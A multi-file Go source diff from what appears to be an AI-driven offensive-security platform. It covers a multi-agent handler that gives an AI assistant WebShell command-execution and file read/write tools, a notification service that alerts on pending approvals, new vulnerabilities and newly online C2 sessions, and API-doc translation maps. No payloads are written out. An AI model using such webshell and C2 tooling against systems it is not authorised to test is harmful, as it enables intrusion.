||||
}
|
||||
|
||||
agentHistoryMessages, err := h.loadHistoryFromAgentTrace(conversationID)
|
||||
if err != nil {
|
||||
historyMessages, getErr := h.db.GetMessages(conversationID)
|
||||
if getErr != nil {
|
||||
agentHistoryMessages = []agent.ChatMessage{}
|
||||
} else {
|
||||
agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages)
|
||||
}
|
||||
}
|
||||
|
||||
finalMessage := req.Message
|
||||
var roleTools []string
|
||||
if req.WebShellConnectionID != "" {
|
||||
conn, errConn := h.db.GetWebshellConnection(strings.TrimSpace(req.WebShellConnectionID))
|
||||
if errConn != nil || conn == nil {
|
||||
h.logger.Warn("WebShell AI 助手:未找到连接", zap.String("id", req.WebShellConnectionID), zap.Error(errConn))
|
||||
return nil, fmt.Errorf("未找到该 WebShell 连接")
|
||||
}
|
||||
webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, req.Message)
|
||||
// WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具)
|
||||
if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" {
|
||||
finalMessage = role.UserPrompt + "\n\n" + webshellContext
|
||||
h.logger.Info("WebShell + 角色: 应用角色提示词(多代理)", zap.String("role", req.Role))
|
||||
} else {
|
||||
finalMessage = webshellContext
|
||||
}
|
||||
} else {
|
||||
finalMessage = webshellContext
|
||||
}
|
||||
roleTools = []string{
|
||||
builtin.ToolWebshellExec,
|
||||
builtin.ToolWebshellFileList,
|
||||
builtin.ToolWebshellFileRead,
|
||||
builtin.ToolWebshellFileWrite,
|
||||
builtin.ToolRecordVulnerability,
|
||||
builtin.ToolListVulnerabilities,
|
||||
builtin.ToolGetVulnerability,
|
||||
builtin.ToolUpsertProjectFact,
|
||||
builtin.ToolGetProjectFact,
|
||||
builtin.ToolListProjectFacts,
|
||||
builtin.ToolSearchProjectFacts,
|
||||
builtin.ToolDeprecateProjectFact,
|
||||
builtin.ToolRestoreProjectFact,
|
||||
builtin.ToolListKnowledgeRiskTypes,
|
||||
builtin.ToolSearchKnowledgeBase,
|
||||
}
|
||||
} else if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled {
|
||||
if role.UserPrompt != "" {
|
||||
finalMessage = role.UserPrompt + "\n\n" + req.Message
|
||||
}
|
||||
roleTools = role.Tools
|
||||
}
|
||||
}
|
||||
|
||||
var savedPaths []string
|
||||
if len(req.Attachments) > 0 {
|
||||
var aerr error
|
||||
savedPaths, aerr = saveAttachmentsToDateAndConversationDir(req.Attachments, conversationID, h.logger)
|
||||
if aerr != nil {
|
||||
return nil, fmt.Errorf("保存上传文件失败: %w", aerr)
|
||||
}
|
||||
}
|
||||
finalMessage = appendAttachmentsToMessage(finalMessage, req.Attachments, savedPaths)
|
||||
|
||||
userContent := userMessageContentForStorage(req.Message, req.Attachments, savedPaths)
|
||||
userMsgRow, uerr := h.db.AddMessage(conversationID, "user", userContent, nil)
|
||||
if uerr != nil {
|
||||
h.logger.Error("保存用户消息失败", zap.Error(uerr))
|
||||
return nil, fmt.Errorf("保存用户消息失败: %w", uerr)
|
||||
}
|
||||
userMessageID := ""
|
||||
if userMsgRow != nil {
|
||||
userMessageID = userMsgRow.ID
|
||||
}
|
||||
|
||||
assistantMsg, aerr := h.db.AddMessage(conversationID, "assistant", "处理中...", nil)
|
||||
var assistantMessageID string
|
||||
if aerr != nil {
|
||||
h.logger.Warn("创建助手消息占位失败", zap.Error(aerr))
|
||||
} else if assistantMsg != nil {
|
||||
assistantMessageID = assistantMsg.ID
|
||||
}
|
||||
|
||||
return &multiAgentPrepared{
|
||||
ConversationID: conversationID,
|
||||
CreatedNew: createdNew,
|
||||
History: agentHistoryMessages,
|
||||
FinalMessage: finalMessage,
|
||||
RoleTools: roleTools,
|
||||
AssistantMessageID: assistantMessageID,
|
||||
UserMessageID: userMessageID,
|
||||
}, nil
|
||||
}
|
||||
@@ -0,0 +1,699 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"sort"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// NotificationHandler 聚合通知(Phase 2:服务端统一计算)
|
||||
type NotificationHandler struct {
|
||||
db *database.DB
|
||||
agentHandler *AgentHandler
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
const notificationReadMaxRows = 150
|
||||
|
||||
// NotificationSummaryItem 通知项
|
||||
type NotificationSummaryItem struct {
|
||||
ID string `json:"id"`
|
||||
Level string `json:"level"` // p0/p1/p2
|
||||
Type string `json:"type"`
|
||||
Title string `json:"title"`
|
||||
Desc string `json:"desc"`
|
||||
Ts string `json:"ts"` // RFC3339
|
||||
Count int `json:"count,omitempty"`
|
||||
Actionable bool `json:"actionable"`
|
||||
Read bool `json:"read"`
|
||||
// 以下字段用于前端深链跳转(通知即入口)
|
||||
ConversationID string `json:"conversationId,omitempty"`
|
||||
VulnerabilityID string `json:"vulnerabilityId,omitempty"`
|
||||
ExecutionID string `json:"executionId,omitempty"`
|
||||
InterruptID string `json:"interruptId,omitempty"`
|
||||
SessionID string `json:"sessionId,omitempty"` // C2 会话(如新会话上线)
|
||||
}
|
||||
|
||||
// NotificationSummaryResponse 聚合响应
|
||||
type NotificationSummaryResponse struct {
|
||||
SinceMs int64 `json:"sinceMs"`
|
||||
GeneratedAt string `json:"generatedAt"`
|
||||
P0Count int `json:"p0Count"`
|
||||
UnreadCount int `json:"unreadCount"`
|
||||
Counts map[string]int `json:"counts"`
|
||||
Items []NotificationSummaryItem `json:"items"`
|
||||
}
|
||||
|
||||
func NewNotificationHandler(db *database.DB, agentHandler *AgentHandler, logger *zap.Logger) *NotificationHandler {
|
||||
return &NotificationHandler{
|
||||
db: db,
|
||||
agentHandler: agentHandler,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
func parseSinceMs(raw string) int64 {
|
||||
v := strings.TrimSpace(raw)
|
||||
if v == "" {
|
||||
return 0
|
||||
}
|
||||
if ms, err := strconv.ParseInt(v, 10, 64); err == nil && ms > 0 {
|
||||
return ms
|
||||
}
|
||||
if t, err := time.Parse(time.RFC3339, v); err == nil {
|
||||
return t.UnixMilli()
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func unixSecToRFC3339(sec int64) string {
|
||||
if sec <= 0 {
|
||||
return time.Now().UTC().Format(time.RFC3339)
|
||||
}
|
||||
return time.Unix(sec, 0).UTC().Format(time.RFC3339)
|
||||
}
|
||||
|
||||
func normalizedSinceSec(sinceMs int64) int64 {
|
||||
sec := sinceMs / 1000
|
||||
// SQLite 默认时间精度到秒;给 1s 回看窗口,避免“同秒内新增”被漏算。
|
||||
if sec > 0 {
|
||||
return sec - 1
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func normalizeSinceMs(raw int64) int64 {
|
||||
if raw > 0 {
|
||||
return raw
|
||||
}
|
||||
// 默认仅看最近 24 小时,避免首次打开拉全量历史噪音。
|
||||
return time.Now().Add(-24 * time.Hour).UnixMilli()
|
||||
}
|
||||
|
||||
func levelBySeverity(sev string) string {
|
||||
switch strings.ToLower(strings.TrimSpace(sev)) {
|
||||
case "critical", "high":
|
||||
return "p0"
|
||||
case "medium":
|
||||
return "p1"
|
||||
default:
|
||||
return "p2"
|
||||
}
|
||||
}
|
||||
|
||||
func requestWantsEnglish(c *gin.Context) bool {
|
||||
if c == nil {
|
||||
return false
|
||||
}
|
||||
lang := strings.ToLower(strings.TrimSpace(c.Query("lang")))
|
||||
if lang == "" {
|
||||
lang = strings.ToLower(strings.TrimSpace(c.GetHeader("Accept-Language")))
|
||||
}
|
||||
return strings.HasPrefix(lang, "en")
|
||||
}
|
||||
|
||||
func i18nText(english bool, zh string, en string) string {
|
||||
if english {
|
||||
return en
|
||||
}
|
||||
return zh
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) loadPendingHITLItems(limit int, english bool) ([]NotificationSummaryItem, error) {
|
||||
rows, err := h.db.Query(`
|
||||
SELECT
|
||||
id,
|
||||
conversation_id,
|
||||
tool_name,
|
||||
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
|
||||
FROM hitl_interrupts
|
||||
WHERE status = 'pending'
|
||||
ORDER BY created_at DESC
|
||||
LIMIT ?
|
||||
`, limit)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
for rows.Next() {
|
||||
var id, conversationID, toolName string
|
||||
var createdSec int64
|
||||
if err := rows.Scan(&id, &conversationID, &toolName, &createdSec); err != nil {
|
||||
continue
|
||||
}
|
||||
desc := i18nText(english, "会话 "+conversationID+" 的审批中断待处理", "Conversation "+conversationID+" has pending HITL approval")
|
||||
if strings.TrimSpace(toolName) != "" {
|
||||
desc = i18nText(english, "工具 "+toolName+" 等待审批", "Tool "+toolName+" is waiting for approval")
|
||||
}
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "hitl:" + id,
|
||||
Level: "p0",
|
||||
Type: "hitl_pending",
|
||||
Title: i18nText(english, "HITL 待审批", "HITL Pending Approval"),
|
||||
Desc: desc,
|
||||
Ts: unixSecToRFC3339(createdSec),
|
||||
Count: 1,
|
||||
Actionable: true,
|
||||
Read: false,
|
||||
ConversationID: conversationID,
|
||||
InterruptID: id,
|
||||
})
|
||||
}
|
||||
return items, nil
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) loadVulnerabilityItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, map[string]int, error) {
|
||||
sinceSec := normalizedSinceSec(sinceMs)
|
||||
rows, err := h.db.Query(`
|
||||
SELECT
|
||||
id,
|
||||
title,
|
||||
severity,
|
||||
conversation_id,
|
||||
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
|
||||
FROM vulnerabilities
|
||||
WHERE CAST(strftime('%s', created_at) AS INTEGER) > ?
|
||||
ORDER BY created_at DESC
|
||||
LIMIT ?
|
||||
`, sinceSec, limit)
|
||||
if err != nil {
|
||||
return nil, nil, err
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
counts := map[string]int{
|
||||
"newCriticalVulns": 0,
|
||||
"newHighVulns": 0,
|
||||
"newMediumVulns": 0,
|
||||
"newLowVulns": 0,
|
||||
"newInfoVulns": 0,
|
||||
}
|
||||
for rows.Next() {
|
||||
var id, title, severity, conversationID string
|
||||
var createdSec int64
|
||||
if err := rows.Scan(&id, &title, &severity, &conversationID, &createdSec); err != nil {
|
||||
continue
|
||||
}
|
||||
switch strings.ToLower(strings.TrimSpace(severity)) {
|
||||
case "critical":
|
||||
counts["newCriticalVulns"]++
|
||||
case "high":
|
||||
counts["newHighVulns"]++
|
||||
case "medium":
|
||||
counts["newMediumVulns"]++
|
||||
case "low":
|
||||
counts["newLowVulns"]++
|
||||
default:
|
||||
counts["newInfoVulns"]++
|
||||
}
|
||||
sevUpper := strings.ToUpper(strings.TrimSpace(severity))
|
||||
if sevUpper == "" {
|
||||
sevUpper = "INFO"
|
||||
}
|
||||
finalTitle := i18nText(english, "新漏洞("+sevUpper+")", "New Vulnerability ("+sevUpper+")")
|
||||
finalDesc := strings.TrimSpace(title)
|
||||
if finalDesc == "" {
|
||||
finalDesc = i18nText(english, "(无标题)", "(Untitled)")
|
||||
}
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "vuln:" + id,
|
||||
Level: levelBySeverity(severity),
|
||||
Type: "vulnerability_created",
|
||||
Title: finalTitle,
|
||||
Desc: finalDesc,
|
||||
Ts: unixSecToRFC3339(createdSec),
|
||||
Count: 1,
|
||||
Actionable: false,
|
||||
Read: false,
|
||||
ConversationID: conversationID,
|
||||
VulnerabilityID: id,
|
||||
})
|
||||
}
|
||||
return items, counts, nil
|
||||
}
|
||||
|
||||
// loadC2SessionOnlineEvents 新会话上线(c2_events:session + critical,与 Manager.IngestCheckIn 一致)
|
||||
func (h *NotificationHandler) loadC2SessionOnlineEvents(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
|
||||
sinceSec := normalizedSinceSec(sinceMs)
|
||||
rows, err := h.db.Query(`
|
||||
SELECT id, message, COALESCE(session_id, ''),
|
||||
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
|
||||
FROM c2_events
|
||||
WHERE category = 'session' AND level = 'critical'
|
||||
AND CAST(strftime('%s', created_at) AS INTEGER) > ?
|
||||
ORDER BY created_at DESC
|
||||
LIMIT ?
|
||||
`, sinceSec, limit)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
for rows.Next() {
|
||||
var id, message, sessionID string
|
||||
var createdSec int64
|
||||
if err := rows.Scan(&id, &message, &sessionID, &createdSec); err != nil {
|
||||
continue
|
||||
}
|
||||
desc := strings.TrimSpace(message)
|
||||
if len(desc) > 220 {
|
||||
desc = desc[:200] + "…"
|
||||
}
|
||||
if desc == "" {
|
||||
desc = i18nText(english, "新会话已建立", "A new session was created")
|
||||
}
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "c2evt:" + id,
|
||||
Level: "p0",
|
||||
Type: "c2_session_online",
|
||||
Title: i18nText(english, "C2 新会话上线", "C2 new session online"),
|
||||
Desc: desc,
|
||||
Ts: unixSecToRFC3339(createdSec),
|
||||
Count: 1,
|
||||
Actionable: false,
|
||||
Read: false,
|
||||
SessionID: sessionID,
|
||||
})
|
||||
}
|
||||
return items, len(items), rows.Err()
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) loadFailedExecutionItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
|
||||
sinceSec := normalizedSinceSec(sinceMs)
|
||||
rows, err := h.db.Query(`
|
||||
SELECT
|
||||
id,
|
||||
tool_name,
|
||||
COALESCE(CAST(strftime('%s', start_time) AS INTEGER), 0)
|
||||
FROM tool_executions
|
||||
WHERE status = 'failed'
|
||||
AND CAST(strftime('%s', start_time) AS INTEGER) > ?
|
||||
ORDER BY start_time DESC
|
||||
LIMIT ?
|
||||
`, sinceSec, limit)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
count := 0
|
||||
for rows.Next() {
|
||||
var id, toolName string
|
||||
var startSec int64
|
||||
if err := rows.Scan(&id, &toolName, &startSec); err != nil {
|
||||
continue
|
||||
}
|
||||
count++
|
||||
if strings.TrimSpace(toolName) == "" {
|
||||
toolName = i18nText(english, "未知工具", "unknown")
|
||||
}
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "exec_failed:" + id,
|
||||
Level: "p0",
|
||||
Type: "task_failed",
|
||||
Title: i18nText(english, "任务执行失败", "Task Execution Failed"),
|
||||
Desc: i18nText(english, "工具 "+toolName+" 执行失败", "Tool "+toolName+" execution failed"),
|
||||
Ts: unixSecToRFC3339(startSec),
|
||||
Count: 1,
|
||||
Actionable: false,
|
||||
Read: false,
|
||||
ExecutionID: id,
|
||||
})
|
||||
}
|
||||
return items, count, nil
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) summarizeLongRunningTasks(threshold time.Duration, english bool) ([]NotificationSummaryItem, int) {
|
||||
if h.agentHandler == nil || h.agentHandler.tasks == nil {
|
||||
return nil, 0
|
||||
}
|
||||
tasks := h.agentHandler.tasks.GetActiveTasks()
|
||||
now := time.Now()
|
||||
items := make([]NotificationSummaryItem, 0, len(tasks))
|
||||
for _, t := range tasks {
|
||||
if t == nil {
|
||||
continue
|
||||
}
|
||||
if now.Sub(t.StartedAt) >= threshold {
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "task_long:" + t.ConversationID,
|
||||
Level: "p1",
|
||||
Type: "long_running_tasks",
|
||||
Title: i18nText(english, "长时间运行任务", "Long Running Task"),
|
||||
Desc: i18nText(english, "会话 "+t.ConversationID+" 运行超过 15 分钟", "Conversation "+t.ConversationID+" has been running over 15 minutes"),
|
||||
Ts: t.StartedAt.UTC().Format(time.RFC3339),
|
||||
Count: 1,
|
||||
Actionable: true,
|
||||
Read: false,
|
||||
ConversationID: t.ConversationID,
|
||||
})
|
||||
}
|
||||
}
|
||||
return items, len(items)
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) summarizeCompletedTasksSince(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int) {
|
||||
if h.agentHandler == nil || h.agentHandler.tasks == nil {
|
||||
return nil, 0
|
||||
}
|
||||
since := time.UnixMilli(sinceMs)
|
||||
completed := h.agentHandler.tasks.GetCompletedTasks()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
for _, t := range completed {
|
||||
if t == nil {
|
||||
continue
|
||||
}
|
||||
if t.CompletedAt.After(since) {
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "task_completed:" + t.ConversationID + ":" + strconv.FormatInt(t.CompletedAt.Unix(), 10),
|
||||
Level: "p2",
|
||||
Type: "task_completed",
|
||||
Title: i18nText(english, "任务完成", "Task Completed"),
|
||||
Desc: i18nText(english, "会话 "+t.ConversationID+" 已完成", "Conversation "+t.ConversationID+" completed"),
|
||||
Ts: t.CompletedAt.UTC().Format(time.RFC3339),
|
||||
Count: 1,
|
||||
Actionable: false,
|
||||
Read: false,
|
||||
ConversationID: t.ConversationID,
|
||||
})
|
||||
if len(items) >= limit {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
return items, len(items)
|
||||
}
|
||||
|
||||
func buildPlaceholders(n int) string {
|
||||
if n <= 0 {
|
||||
return ""
|
||||
}
|
||||
out := make([]string, 0, n)
|
||||
for i := 0; i < n; i++ {
|
||||
out = append(out, "?")
|
||||
}
|
||||
return strings.Join(out, ",")
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) readStatesByIDs(ids []string) (map[string]bool, error) {
|
||||
result := make(map[string]bool, len(ids))
|
||||
if len(ids) == 0 {
|
||||
return result, nil
|
||||
}
|
||||
holders := buildPlaceholders(len(ids))
|
||||
query := "SELECT event_id FROM notification_reads WHERE event_id IN (" + holders + ")"
|
||||
args := make([]interface{}, 0, len(ids))
|
||||
for _, id := range ids {
|
||||
args = append(args, id)
|
||||
}
|
||||
rows, err := h.db.Query(query, args...)
|
||||
if err != nil {
|
||||
return result, err
|
||||
}
|
||||
defer rows.Close()
|
||||
for rows.Next() {
|
||||
var id string
|
||||
if err := rows.Scan(&id); err != nil {
|
||||
continue
|
||||
}
|
||||
result[id] = true
|
||||
}
|
||||
return result, nil
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) applyReadStates(items []NotificationSummaryItem) ([]NotificationSummaryItem, error) {
|
||||
markableIDs := make([]string, 0, len(items))
|
||||
for _, item := range items {
|
||||
if item.Actionable {
|
||||
continue
|
||||
}
|
||||
markableIDs = append(markableIDs, item.ID)
|
||||
}
|
||||
readMap, err := h.readStatesByIDs(markableIDs)
|
||||
if err != nil {
|
||||
return items, err
|
||||
}
|
||||
for i := range items {
|
||||
if items[i].Actionable {
|
||||
items[i].Read = false
|
||||
continue
|
||||
}
|
||||
items[i].Read = readMap[items[i].ID]
|
||||
}
|
||||
return items, nil
|
||||
}
|
||||
|
||||
func filterVisibleItems(items []NotificationSummaryItem) []NotificationSummaryItem {
|
||||
out := make([]NotificationSummaryItem, 0, len(items))
|
||||
for _, item := range items {
|
||||
if item.Actionable || !item.Read {
|
||||
out = append(out, item)
|
||||
}
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func countP0(items []NotificationSummaryItem) int {
|
||||
total := 0
|
||||
for _, item := range items {
|
||||
if item.Level == "p0" {
|
||||
if item.Count > 0 {
|
||||
total += item.Count
|
||||
} else {
|
||||
total++
|
||||
}
|
||||
}
|
||||
}
|
||||
return total
|
||||
}
|
||||
|
||||
func countUnread(items []NotificationSummaryItem) int {
|
||||
total := 0
|
||||
for _, item := range items {
|
||||
if item.Actionable || !item.Read {
|
||||
if item.Count > 0 {
|
||||
total += item.Count
|
||||
} else {
|
||||
total++
|
||||
}
|
||||
}
|
||||
}
|
||||
return total
|
||||
}
|
||||
|
||||
func createNotificationReadTableIfNeeded(db *database.DB) error {
|
||||
if db == nil {
|
||||
return fmt.Errorf("db is nil")
|
||||
}
|
||||
_, err := db.Exec(`
|
||||
CREATE TABLE IF NOT EXISTS notification_reads (
|
||||
event_id TEXT PRIMARY KEY,
|
||||
read_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);
|
||||
`)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_, idxErr := db.Exec(`CREATE INDEX IF NOT EXISTS idx_notification_reads_read_at ON notification_reads(read_at DESC);`)
|
||||
return idxErr
|
||||
}
|
||||
|
||||
func pruneNotificationReads(db *database.DB, maxRows int) error {
|
||||
if db == nil {
|
||||
return fmt.Errorf("db is nil")
|
||||
}
|
||||
if maxRows <= 0 {
|
||||
return nil
|
||||
}
|
||||
_, err := db.Exec(`
|
||||
DELETE FROM notification_reads
|
||||
WHERE event_id NOT IN (
|
||||
SELECT event_id
|
||||
FROM notification_reads
|
||||
ORDER BY read_at DESC, rowid DESC
|
||||
LIMIT ?
|
||||
)
|
||||
`, maxRows)
|
||||
return err
|
||||
}
|
||||
|
||||
type markReadRequest struct {
|
||||
EventIDs []string `json:"eventIds"`
|
||||
}
|
||||
|
||||
func normalizeMarkableEventID(id string) (string, bool) {
|
||||
v := strings.TrimSpace(id)
|
||||
if v == "" {
|
||||
return "", false
|
||||
}
|
||||
// 仅允许“可读后隐藏”的信息类事件;Actionable 事件不参与 read 标记。
|
||||
allowedPrefixes := []string{
|
||||
"vuln:",
|
||||
"exec_failed:",
|
||||
"task_completed:",
|
||||
"c2evt:",
|
||||
}
|
||||
for _, prefix := range allowedPrefixes {
|
||||
if strings.HasPrefix(v, prefix) {
|
||||
return v, true
|
||||
}
|
||||
}
|
||||
return "", false
|
||||
}
|
||||
|
||||
// MarkRead 按事件 ID 标记已读
|
||||
func (h *NotificationHandler) MarkRead(c *gin.Context) {
|
||||
if err := createNotificationReadTableIfNeeded(h.db); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare notification read table"})
|
||||
return
|
||||
}
|
||||
var req markReadRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid request body"})
|
||||
return
|
||||
}
|
||||
if len(req.EventIDs) == 0 {
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true, "marked": 0})
|
||||
return
|
||||
}
|
||||
tx, err := h.db.Begin()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to begin transaction"})
|
||||
return
|
||||
}
|
||||
defer func() {
|
||||
_ = tx.Rollback()
|
||||
}()
|
||||
stmt, err := tx.Prepare(`
|
||||
INSERT INTO notification_reads(event_id, read_at)
|
||||
VALUES(?, CURRENT_TIMESTAMP)
|
||||
ON CONFLICT(event_id) DO UPDATE SET read_at = CURRENT_TIMESTAMP
|
||||
`)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare statement"})
|
||||
return
|
||||
}
|
||||
defer stmt.Close()
|
||||
marked := 0
|
||||
for _, raw := range req.EventIDs {
|
||||
id, ok := normalizeMarkableEventID(raw)
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
if _, err := stmt.Exec(id); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to mark read"})
|
||||
return
|
||||
}
|
||||
marked++
|
||||
}
|
||||
if err := tx.Commit(); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to commit read marks"})
|
||||
return
|
||||
}
|
||||
if err := pruneNotificationReads(h.db, notificationReadMaxRows); err != nil {
|
||||
h.logger.Warn("裁剪通知已读记录失败", zap.Error(err))
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true, "marked": marked})
|
||||
}
|
||||
|
||||
// GetSummary 返回通知聚合视图(用于头部铃铛)
|
||||
func (h *NotificationHandler) GetSummary(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := createNotificationReadTableIfNeeded(h.db); err != nil {
|
||||
h.logger.Warn("初始化通知已读表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to initialize notification read table"})
|
||||
return
|
||||
}
|
||||
|
||||
english := requestWantsEnglish(c)
|
||||
sinceMs := normalizeSinceMs(parseSinceMs(c.Query("since")))
|
||||
limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("limit", "50")))
|
||||
if limit <= 0 {
|
||||
limit = 50
|
||||
}
|
||||
if limit > 200 {
|
||||
limit = 200
|
||||
}
|
||||
|
||||
hitlItems, err := h.loadPendingHITLItems(limit, english)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载 HITL 通知失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize hitl notifications"})
|
||||
return
|
||||
}
|
||||
|
||||
vulnItems, vulnCounts, err := h.loadVulnerabilityItems(sinceMs, limit, english)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载漏洞通知失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize vulnerabilities"})
|
||||
return
|
||||
}
|
||||
|
||||
c2OnlineItems, c2OnlineCount, err := h.loadC2SessionOnlineEvents(sinceMs, limit, english)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载 C2 会话上线通知失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize c2 session events"})
|
||||
return
|
||||
}
|
||||
|
||||
longRunningItems, longRunningCount := h.summarizeLongRunningTasks(15*time.Minute, english)
|
||||
completedItems, completedCount := h.summarizeCompletedTasksSince(sinceMs, limit, english)
|
||||
|
||||
items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(c2OnlineItems)+len(longRunningItems)+len(completedItems))
|
||||
items = append(items, hitlItems...)
|
||||
items = append(items, vulnItems...)
|
||||
items = append(items, c2OnlineItems...)
|
||||
items = append(items, longRunningItems...)
|
||||
items = append(items, completedItems...)
|
||||
|
||||
items, err = h.applyReadStates(items)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载通知已读状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to load notification read states"})
|
||||
return
|
||||
}
|
||||
items = filterVisibleItems(items)
|
||||
|
||||
sort.Slice(items, func(i, j int) bool {
|
||||
ti, errI := time.Parse(time.RFC3339, items[i].Ts)
|
||||
tj, errJ := time.Parse(time.RFC3339, items[j].Ts)
|
||||
if errI != nil || errJ != nil {
|
||||
return i < j
|
||||
}
|
||||
return ti.After(tj)
|
||||
})
|
||||
|
||||
p0Count := countP0(items)
|
||||
unreadCount := countUnread(items)
|
||||
c.JSON(http.StatusOK, NotificationSummaryResponse{
|
||||
SinceMs: sinceMs,
|
||||
GeneratedAt: time.Now().UTC().Format(time.RFC3339),
|
||||
P0Count: p0Count,
|
||||
UnreadCount: unreadCount,
|
||||
Counts: map[string]int{
|
||||
"hitlPending": len(hitlItems),
|
||||
"newCriticalVulns": vulnCounts["newCriticalVulns"],
|
||||
"newHighVulns": vulnCounts["newHighVulns"],
|
||||
"newMediumVulns": vulnCounts["newMediumVulns"],
|
||||
"newLowVulns": vulnCounts["newLowVulns"],
|
||||
"newInfoVulns": vulnCounts["newInfoVulns"],
|
||||
"failedExecutions": 0,
|
||||
"longRunningTasks": longRunningCount,
|
||||
"completedTasks": completedCount,
|
||||
"c2SessionOnline": c2OnlineCount,
|
||||
},
|
||||
Items: items,
|
||||
})
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,174 @@
|
||||
package handler
|
||||
|
||||
// apiDocI18n 为 OpenAPI 文档提供 x-i18n-* 扩展键,供前端 apiDocs 国际化使用。
|
||||
// 前端通过 apiDocs.tags.* / apiDocs.summary.* / apiDocs.response.* 翻译。
|
||||
|
||||
var apiDocI18nTagToKey = map[string]string{
|
||||
"认证": "auth", "对话管理": "conversationManagement", "对话交互": "conversationInteraction",
|
||||
"批量任务": "batchTasks", "对话分组": "conversationGroups", "漏洞管理": "vulnerabilityManagement",
|
||||
"角色管理": "roleManagement", "Skills管理": "skillsManagement", "监控": "monitoring",
|
||||
"配置管理": "configManagement", "外部MCP管理": "externalMCPManagement", "攻击链": "attackChain",
|
||||
"知识库": "knowledgeBase", "MCP": "mcp",
|
||||
"FOFA信息收集": "fofaRecon", "终端": "terminal", "WebShell管理": "webshellManagement",
|
||||
"对话附件": "chatUploads", "机器人集成": "robotIntegration", "多代理Markdown": "markdownAgents",
|
||||
}
|
||||
|
||||
var apiDocI18nSummaryToKey = map[string]string{
|
||||
"用户登录": "login", "用户登出": "logout", "修改密码": "changePassword", "验证Token": "validateToken",
|
||||
"创建对话": "createConversation", "列出对话": "listConversations", "查看对话详情": "getConversationDetail",
|
||||
"更新对话": "updateConversation", "删除对话": "deleteConversation", "获取对话结果": "getConversationResult",
|
||||
